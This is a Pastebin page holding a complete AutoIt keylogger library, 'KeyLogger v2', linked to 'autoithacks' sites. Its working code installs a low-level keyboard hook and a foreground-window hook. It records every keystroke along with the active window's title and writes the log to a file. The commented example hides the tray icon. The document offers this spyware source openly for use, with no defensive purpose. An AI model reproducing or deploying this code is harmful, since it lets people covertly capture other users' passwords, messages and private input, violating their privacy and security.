Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include-once
- #cs ----------------------------------------------------------------------------
- AutoIt Version: 3.3.9.4
- Author : THAT1ANONYMOUSDUDE
- Credits: The Internet
- Page: www.autorepo.tk
- Paste: www.autoithacks.tk
- Script Function: Implement basic keylogging functionality.
- Autoit KeyLogger UDF - AutoIt script.
- #ce ----------------------------------------------------------------------------
- ; #INDEX# =======================================================================================================================
- ; Title ....................: KeyLogger v2
- ; Tested On AutoIt Version .: 3.3.8.1++
- ; Description ..............: Easy to use apparatus for implementation of key-processing in user scripts.
- ; Author(s) ................: THAT1ANONYMOUSDUDE - No relation to orginazation portrayed by media...
- ; ===============================================================================================================================
- ; #VARIABLES# ===================================================================================================================
- Global $__KL_Hook
- Global $__KL_WinHook
- Global $__KL_KB_Hook
- Global $__KL_WinEvent_Hook
- Global $__KL_CapturedKeys
- Global $__KL_LogFile
- Global $__KL_User32
- ; ===============================================================================================================================
- ; #CONSTANTS# ===================================================================================================================
- Global Const $__KL_Array_Virtual_Keys = _PopulateKeys()
- ; ===============================================================================================================================
- ; #CURRENT# =====================================================================================================================
- ;_SetHooks
- ; ===============================================================================================================================
- ; #INTERNAL_USE_ONLY# ===========================================================================================================
- ;_PopulateKeys
- ;_KeyProcess
- ;_WindowsEventProcess
- ;$__KL_Array_Virtual_Keys
- ;$__KL_Hook
- ;$__KL_WinHook
- ;$__KL_KB_Hook
- ;$__KL_WinEvent_Hook
- ;$__KL_CapturedKeys
- ;$__KL_LogFile
- ;$__KL_User32
- ; ===============================================================================================================================
- ; #EXAMPLE USAGE# ===============================================================================================================
- ;~ ;#NoTrayIcon
- ;~ #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
- ;~ #AutoIt3Wrapper_Outfile_type=a3x
- ;~ #AutoIt3Wrapper_Compression=4
- ;~ #AutoIt3Wrapper_Res_Fileversion=2.0.0.0
- ;~ #AutoIt3Wrapper_AU3Check_Parameters=-d -w 1 -w 2 -w 3 -w 4 -w 6
- ;~ #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
- ;~ HotKeySet("{esc}", "_Exit")
- ;~ OnAutoItExitRegister("_Exit")
- ;~ _SetHooks(True,@DesktopDir & "\KeyLog.log")
- ;~ While Sleep(100)
- ;~ ToolTip($__KL_CapturedKeys)
- ;~ WEnd
- ;~ Func _Exit()
- ;~ _SetHooks()
- ;~ If $__KL_LogFile Then FileWrite($__KL_LogFile,$__KL_CapturedKeys)
- ;~ OnAutoItExitUnRegister("_Exit")
- ;~ Exit
- ;~ EndFunc
- ; ===============================================================================================================================
- ; #FUNCTION# ====================================================================================================================
- ; Name ..........: _SetHooks
- ; Description ...: Starts the key capturing process by setting 2 different hooks, a keyboard hook and windows event hook.
- ; Syntax ........: _SetHooks([$Type = False[, $__KL_LogFilePath = False]])
- ; Parameters ....: $Type - [optional] Set this to true to start capturing keys. Default is False, which
- ; disables any previously set hooks, you should call this function with
- ; no parameters when you wish to stop the key capturing process.
- ;
- ; $__KL_LogFilePath - [optional] A string path to the log file you would like to save the captured keys in.
- ; Default is False, which will just save the captured keys to the $__KL_CapturedKeys
- ; variable and let you handle / decide what to do with them there.
- ;
- ; Return values .: True if operation successful, false if error occured and error code code set to positive value.
- ; @Error -
- ; | 1 - Setting a dll call back to _KeyProcess function has failed.
- ; | 2 - Dllcall to GetModuleHandleW has failed. @extended set to dllcall @error return.
- ; | 3 - Dllcall to SetWindowsHookEx has failed. @extended set to dllcall @error return.
- ; | 4 - Setting a dll call back to _WindowsEventProcess function has failed.
- ; | 5 - DllCall to SetWinEventHook has failed. @extended set to dllcall @error return.
- ;
- ; Author ........: THAT1ANONYMOUSDUDE
- ; Modified ......:
- ; Remarks .......: To disable the hook process, call this function again with no parameters.
- ; If you passed a file name as the second parameter, all the captured keys and events will be saved to
- ; the file path you specified.
- ;
- ; Related .......: _WindowsEventProcess, _KeyProcess
- ; Link ..........: Forbidden by Jon
- ; Example .......: Yes, look above.
- ; ===============================================================================================================================
- Func _SetHooks($Type = False, $__KL_LogFilePath = 0x0)
- Switch $Type
- Case True
- If $__KL_LogFilePath Then
- $__KL_LogFile = $__KL_LogFilePath; set path to log file
- EndIf
- If Not ($__KL_User32) Then
- $__KL_User32 = DllOpen("User32.dll")
- EndIf
- $__KL_KB_Hook = DllCallbackRegister("_KeyProcess", "long", "int;wparam;lparam")
- If Not $__KL_KB_Hook Then Return SetError(1,0,False)
- Local $aResult = DllCall("kernel32.dll", "handle", "GetModuleHandleW", "ptr", 0)
- If @error Then Return SetError(2, @error, False)
- $aResult = DllCall($__KL_User32, "handle", "SetWindowsHookEx", _
- "int", 13, _ ; WH_KEYBOARD_LL
- "ptr", DllCallbackGetPtr($__KL_KB_Hook), _
- "handle", $aResult[0], _
- "dword", 0 _
- )
- If @error Then Return SetError(3, @error, False)
- $__KL_Hook = $aResult[0]
- $__KL_WinEvent_Hook = DllCallbackRegister("_WindowsEventProcess", "none", "hwnd;int;hwnd;long;long;int;int")
- If Not $__KL_WinEvent_Hook Then Return SetError(4,0,False)
- $aResult = DllCall($__KL_User32, "hwnd", "SetWinEventHook", _
- "uint", 0x0003, _; EVENT_SYSTEM_FOREGROUND
- "uint", 0x0003, _; EVENT_SYSTEM_FOREGROUND
- "hwnd", 0, _
- "ptr", DllCallbackGetPtr($__KL_WinEvent_Hook), _
- "int", 0, _
- "int", 0, _
- "uint", BitOR(0x0, 0x2) _
- )
- If @error Then Return SetError(5, @error, False)
- $__KL_WinHook = $aResult[0]
- Case False
- DllCall($__KL_User32, "bool", "UnhookWindowsHookEx", "handle", $__KL_Hook)
- DllCallbackFree($__KL_KB_Hook)
- DllCall($__KL_User32, "int", "UnhookWinEvent", "hwnd", $__KL_WinHook)
- DllCallbackFree($__KL_WinEvent_Hook)
- DllClose($__KL_User32)
- $__KL_User32 = 0
- EndSwitch
- Return SetError(0,0,True)
- EndFunc ;==>_SetHooks
- ; #INTERNAL_USE_ONLY# ===========================================================================================================
- ; Name ..........: _KeyProcess
- ; Description ...: Processes pressed keys and capturs them into a variable.
- ; Syntax ........: _KeyProcess($NCode, $WParam, $LParam)
- ; Parameters ....: $NCode - DLLCallback parameter.
- ; $WParam - DLLCallback parameter.
- ; $LParam - DLLCallback parameter.
- ; Return values .: None
- ; Author ........: THAT1ANONYMOUSDUDE
- ; Modified ......:
- ; Remarks .......: None
- ; Related .......: _WindowsEventProcess
- ; Link ..........: Nope.txt.vbs
- ; Example .......: No
- ; ===============================================================================================================================
- Func _KeyProcess($NCode, $WParam, $LParam)
- Local $aResult
- ;ConsoleWrite($LParam & @CR)
- If $NCode < 0 Then
- $aResult = DllCall($__KL_User32, "lresult", "CallNextHookEx", "handle", $__KL_Hook, "int", $NCode, "wparam", $WParam, "lparam", $LParam)
- If @error Then Return SetError(@error, @extended, -1)
- Return $aResult[0]
- EndIf
- Local $kcStruc = DllStructCreate("dword vkCode;dword scanCode;dword flags;dword time;ulong_ptr dwExtraInfo", $LParam)
- Local $scanCode = DllStructGetData($kcStruc, "scanCode")
- Local $vkCode = DllStructGetData($kcStruc, "vkCode"); start converting key codes!
- Switch $WParam
- Case 256
- DllCall($__KL_User32, "long", "GetKeyState", "long", 0);This dll call in here is interesting, I don't know why but if I wouldn't have added it, keys would not appear in proper case ,:/ remove it and see what I mean!
- If $__KL_Array_Virtual_Keys[$vkCode][1] Then
- Local $aRet = DllCall($__KL_User32, "int", "GetKeyNameText", _
- "int", BitOR(BitShift($scanCode,-16),BitShift(DllStructGetData($kcStruc,"flags"),-24)), _
- "str", "", _
- "int", 256 _
- )
- If StringLen($aRet[2]) > 1 Then $__KL_CapturedKeys &= "[" & $aRet[2] & "]"
- EndIf
- Case Else
- If $__KL_Array_Virtual_Keys[$vkCode][2] Then
- Local $KeyProcess = DllStructCreate("byte[256];Char")
- DllCall($__KL_User32, "int", "GetKeyboardState", "ptr", DllStructGetPtr($KeyProcess))
- If @error Then Return SetError(@error, 0, 0)
- DllCall($__KL_User32, "int", "ToAsciiEx", _
- "uint", $vkCode, _
- "uint", $scanCode, _
- "ptr", DllStructGetPtr($KeyProcess, 1), _
- "ptr", DllStructGetPtr($KeyProcess,2), _
- "uint", 0, _
- "hwnd", "" _
- )
- If Not @error Then $__KL_CapturedKeys &= DllStructGetData($KeyProcess, 2)
- EndIf
- EndSwitch
- $aResult = DllCall($__KL_User32, "lresult", "CallNextHookEx", "handle", $__KL_Hook, "int", $NCode, "wparam", $WParam, "lparam", $LParam)
- If @error Then Return SetError(@error, @extended, -1)
- Return $aResult[0]
- EndFunc ;==>_KeyProcess
- ; #INTERNAL_USE_ONLY# ===========================================================================================================
- ; Name ..........: _WindowsEventProcess
- ; Description ...: Handls windows events.
- ; Syntax ........: _WindowsEventProcess($__KL_Hook, $iEvent, $hWnd, $idObject, $idChild, $iEventThread, $iEventTime)
- ; Parameters ....: Parameters are passed by the call back process.
- ; Return values .: None
- ; Author ........: THAT1ANONYMOUSDUDE
- ; Modified ......:
- ; Remarks .......: This function will detect what window is recieving user input.
- ; Related .......: _KeyProcess
- ; Link ..........:
- ; Example .......: No
- ; ===============================================================================================================================
- Func _WindowsEventProcess($__KL_Hook, $iEvent, $hWnd, $idObject, $idChild, $iEventThread, $iEventTime)
- If $iEvent <> 3 Then Return 0; if it's three, then user switched window fucus to something else, get its name...
- $__KL_CapturedKeys &= @CRLF & @CRLF & "[" & WinGetTitle($hWnd) & "]" & @CRLF
- Return 0
- EndFunc ;==>_WindowsEventProcess
- ; #INTERNAL_USE_ONLY# ===========================================================================================================
- ; Name ..........: _PopulateKeys
- ; Description ...: Populates a global array of settings for particular virtual keys.
- ; Syntax ........: _PopulateKeys()
- ; Parameters ....: None
- ; Return values .: 3D Array
- ; Author ........: THAT1ANONYMOUSDUDE
- ; Modified ......:
- ; Remarks .......: You may be asking yourself why I'm using this huge 3d array here
- ; to put it simply, it works very very fast in comparison to any other
- ; method that I am aware of in AutoIt, so all I've got to do here is
- ; access an array index via virtual key code and check to see what
- ; has to be done depending on the value of the 2nd or 3rd dimension
- ; of the array. In the first dimension of the array you will notice
- ; that there are only names of some action keys, these are only there
- ; to help you identify what is what when a virtual key code is passed
- ; to the array for access to the 2nd or 3rd dimension index in the array.
- ; If you want to also detect left or right shift key presses, then tuff
- ; luck, I changed the code for reasons unknown but it's pretty damn easy
- ; to detect them if you know what you're doing. Hint, it's easily done
- ; tracking them in key down time.
- ;
- ; Related .......: None
- ; Link ..........: No
- ; Example .......: No
- ; ===============================================================================================================================
- Func _PopulateKeys()
- Local $aVK[223][3] = _; Key Up Key Down DEC HEX
- [ _
- ["", False , True], _ ; 0 00000000
- ["", False , True], _ ; 1 00000001
- ["", False , True], _ ; 2 00000002
- ["", False , True], _ ; 3 00000003
- ["", False , True], _ ; 4 00000004
- ["", False , True], _ ; 5 00000005
- ["", False , True], _ ; 6 00000006
- ["", False , True], _ ; 7 00000007
- ["[BACK SPACE]", True , False], _ ; 8 00000008
- ["[TAB]", True , False], _ ; 9 00000009
- ["", False , True], _ ; 10 0000000A
- ["", False , True], _ ; 11 0000000B
- ["[CLEAR]", True , False], _ ; 12 0000000C
- ["[ENTER]", True , False], _ ; 13 0000000D
- ["", False , True], _ ; 14 0000000E
- ["", False , True], _ ; 15 0000000F
- ["[SHIFT]", True , False], _ ; 16 00000010
- ["[CTRL]", True , False], _ ; 17 00000011
- ["[ALT]", True , False], _ ; 18 00000012
- ["[PAUSE]", True , False], _ ; 19 00000013
- ["[CAPS LOCK]", True , False], _ ; 20 00000014
- ["", False , True], _ ; 21 00000015
- ["", False , True], _ ; 22 00000016
- ["", False , True], _ ; 23 00000017
- ["", False , True], _ ; 24 00000018
- ["", False , True], _ ; 25 00000019
- ["", False , True], _ ; 26 0000001A
- ["[ESC]", True , False], _ ; 27 0000001B
- ["", False , True], _ ; 28 0000001C
- ["", False , True], _ ; 29 0000001D
- ["", False , True], _ ; 30 0000001E
- ["", False , True], _ ; 31 0000001F
- ["[SPACE]", False , True], _ ; 32 00000020
- ["[PAGE UP]", True , False], _ ; 33 00000021
- ['[PAGE DOWN]', True , False], _ ; 34 00000022
- ["[END]", True , False], _ ; 35 00000023
- ["[HOME]", True , False], _ ; 36 00000024
- ["[LEFT ARROW]", True , False], _ ; 37 00000025
- ["[UP ARROW]", True , False], _ ; 38 00000026
- ["[RIGHT ARROW]", True , False], _ ; 39 00000027
- ["[DOWN ARROW]", True , False], _ ; 40 00000028
- ["", False , True], _ ; 41 00000029
- ["", False , True], _ ; 42 0000002A
- ["", False , True], _ ; 43 0000002B
- ["[PRINT-SCREEN]", True , False], _ ; 44 0000002C
- ["[INSERT]", True , False], _ ; 45 0000002D
- ["[DELETE]", True , False], _ ; 46 0000002E
- ["", False , True], _ ; 47 0000002F
- ["", False , True], _ ; 48 00000030
- ["", False , True], _ ; 49 00000031
- ["", False , True], _ ; 50 00000032
- ["", False , True], _ ; 51 00000033
- ["", False , True], _ ; 52 00000034
- ["", False , True], _ ; 53 00000035
- ["", False , True], _ ; 54 00000036
- ["", False , True], _ ; 55 00000037
- ["", False , True], _ ; 56 00000038
- ["", False , True], _ ; 57 00000039
- ["", False , True], _ ; 58 0000003A
- ["", False , True], _ ; 59 0000003B
- ["", False , True], _ ; 60 0000003C
- ["", False , True], _ ; 61 0000003D
- ["", False , True], _ ; 62 0000003E
- ["", False , True], _ ; 63 0000003F
- ["", False , True], _ ; 64 00000040
- ["", False , True], _ ; 65 00000041
- ["", False , True], _ ; 66 00000042
- ["", False , True], _ ; 67 00000043
- ["", False , True], _ ; 68 00000044
- ["", False , True], _ ; 69 00000045
- ["", False , True], _ ; 70 00000046
- ["", False , True], _ ; 71 00000047
- ["", False , True], _ ; 72 00000048
- ["", False , True], _ ; 73 00000049
- ["", False , True], _ ; 74 0000004A
- ["", False , True], _ ; 75 0000004B
- ["", False , True], _ ; 76 0000004C
- ["", False , True], _ ; 77 0000004D
- ["", False , True], _ ; 78 0000004E
- ["", False , True], _ ; 79 0000004F
- ["", False , True], _ ; 80 00000050
- ["", False , True], _ ; 81 00000051
- ["", False , True], _ ; 82 00000052
- ["", False , True], _ ; 83 00000053
- ["", False , True], _ ; 84 00000054
- ["", False , True], _ ; 85 00000055
- ["", False , True], _ ; 86 00000056
- ["", False , True], _ ; 87 00000057
- ["", False , True], _ ; 88 00000058
- ["", False , True], _ ; 89 00000059
- ["", False , True], _ ; 90 0000005A
- ["[L-WINDOWS KEY]", True , False], _ ; 91 0000005B
- ["[R-WINDOWS KEY]", True , False], _ ; 92 0000005C
- ["[APP-KEY]", True , False], _ ; 93 0000005D
- ["", False , True], _ ; 94 0000005E
- ["", False , True], _ ; 95 0000005F
- ["", False , True], _ ; 96 00000060
- ["", False , True], _ ; 97 00000061
- ["", False , True], _ ; 98 00000062
- ["", False , True], _ ; 99 00000063
- ["", False , True], _ ; 100 00000064
- ["", False , True], _ ; 101 00000065
- ["", False , True], _ ; 102 00000066
- ["", False , True], _ ; 103 00000067
- ["", False , True], _ ; 104 00000068
- ["", False , True], _ ; 105 00000069
- ["", False , True], _ ; 106 0000006A
- ["", False , True], _ ; 107 0000006B
- ["", False , True], _ ; 108 0000006C
- ["", False , True], _ ; 109 0000006D
- ["", False , True], _ ; 110 0000006E
- ["", False , True], _ ; 111 0000006F
- ["[F1]", True , False], _ ; 112 00000070
- ["[F2]", True , False], _ ; 113 00000071
- ["[F3]", True , False], _ ; 114 00000072
- ["[F4]", True , False], _ ; 115 00000073
- ["[F5]", True , False], _ ; 116 00000074
- ["[F6]", True , False], _ ; 117 00000075
- ["[F7]", True , False], _ ; 118 00000076
- ["[F8]", True , False], _ ; 119 00000077
- ["[F9]", True , False], _ ; 120 00000078
- ["[F10]", True , False], _ ; 121 00000079
- ["[F11]", True , False], _ ; 122 0000007A
- ["[F12]", True , False], _ ; 123 0000007B
- ["", False , True], _ ; 124 0000007C
- ["", False , True], _ ; 125 0000007D
- ["", False , True], _ ; 126 0000007E
- ["", False , True], _ ; 127 0000007F
- ["", False , True], _ ; 128 00000080
- ["", False , True], _ ; 129 00000081
- ["", False , True], _ ; 130 00000082
- ["", False , True], _ ; 131 00000083
- ["", False , True], _ ; 132 00000084
- ["", False , True], _ ; 133 00000085
- ["", False , True], _ ; 134 00000086
- ["", False , True], _ ; 135 00000087
- ["", False , True], _ ; 136 00000088
- ["", False , True], _ ; 137 00000089
- ["", False , True], _ ; 138 0000008A
- ["", False , True], _ ; 139 0000008B
- ["", False , True], _ ; 140 0000008C
- ["", False , True], _ ; 141 0000008D
- ["", False , True], _ ; 142 0000008E
- ["", False , True], _ ; 143 0000008F
- ["[NUM-LOCK]", True , False], _ ; 144 00000090
- ["[SCROLL LOCK]", True , False], _ ; 145 00000091
- ["", False , True], _ ; 146 00000092
- ["", False , True], _ ; 147 00000093
- ["", False , True], _ ; 148 00000094
- ["", False , True], _ ; 149 00000095
- ["", False , True], _ ; 150 00000096
- ["", False , True], _ ; 151 00000097
- ["", False , True], _ ; 152 00000098
- ["", False , True], _ ; 153 00000099
- ["", False , True], _ ; 154 0000009A
- ["", False , True], _ ; 155 0000009B
- ["", False , True], _ ; 156 0000009C
- ["", False , True], _ ; 157 0000009D
- ["", False , True], _ ; 158 0000009E
- ["", False , True], _ ; 159 0000009F
- ["[L-SHIFT]", True , False], _ ; 160 000000A0
- ["[R-SHIFT]", True , False], _ ; 161 000000A1
- ["[L-CTRL]", True , False], _ ; 162 000000A2
- ["[R-CTRL]", True , False], _ ; 163 000000A3
- ["[L-ALT]", True , False], _ ; 164 000000A4
- ["[R-ALT]", True , False], _ ; 165 000000A5
- ["", False , True], _ ; 166 000000A6
- ["", False , True], _ ; 167 000000A7
- ["", False , True], _ ; 168 000000A8
- ["", False , True], _ ; 169 000000A9
- ["", False , True], _ ; 170 000000AA
- ["", False , True], _ ; 171 000000AB
- ["", False , True], _ ; 172 000000AC
- ["", False , True], _ ; 173 000000AD
- ["", False , True], _ ; 174 000000AE
- ["", False , True], _ ; 175 000000AF
- ["", False , True], _ ; 176 000000B0
- ["", False , True], _ ; 177 000000B1
- ["", False , True], _ ; 178 000000B2
- ["", False , True], _ ; 179 000000B3
- ["", False , True], _ ; 180 000000B4
- ["", False , True], _ ; 181 000000B5
- ["", False , True], _ ; 182 000000B6
- ["", False , True], _ ; 183 000000B7
- ["", False , True], _ ; 184 000000B8
- ["", False , True], _ ; 185 000000B9
- ["", False , True], _ ; 186 000000BA
- ["", False , True], _ ; 187 000000BB
- ["", False , True], _ ; 188 000000BC
- ["", False , True], _ ; 189 000000BD
- ["", False , True], _ ; 190 000000BE
- ["", False , True], _ ; 191 000000BF
- ["", False , True], _ ; 192 000000C0
- ["", False , True], _ ; 193 000000C1
- ["", False , True], _ ; 194 000000C2
- ["", False , True], _ ; 195 000000C3
- ["", False , True], _ ; 196 000000C4
- ["", False , True], _ ; 197 000000C5
- ["", False , True], _ ; 198 000000C6
- ["", False , True], _ ; 199 000000C7
- ["", False , True], _ ; 200 000000C8
- ["", False , True], _ ; 201 000000C9
- ["", False , True], _ ; 202 000000CA
- ["", False , True], _ ; 203 000000CB
- ["", False , True], _ ; 204 000000CC
- ["", False , True], _ ; 205 000000CD
- ["", False , True], _ ; 206 000000CE
- ["", False , True], _ ; 207 000000CF
- ["", False , True], _ ; 208 000000D0
- ["", False , True], _ ; 209 000000D1
- ["", False , True], _ ; 210 000000D2
- ["", False , True], _ ; 211 000000D3
- ["", False , True], _ ; 212 000000D4
- ["", False , True], _ ; 213 000000D5
- ["", False , True], _ ; 214 000000D6
- ["", False , True], _ ; 215 000000D7
- ["", False , True], _ ; 216 000000D8
- ["", False , True], _ ; 217 000000D9
- ["", False , True], _ ; 218 000000DA
- ["", False , True], _ ; 219 000000DB
- ["", False , True], _ ; 220 000000DC
- ["", False , True], _ ; 221 000000DD
- ["", False , True] _ ; 222 000000DE
- ]
- Return $aVK
- EndFunc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement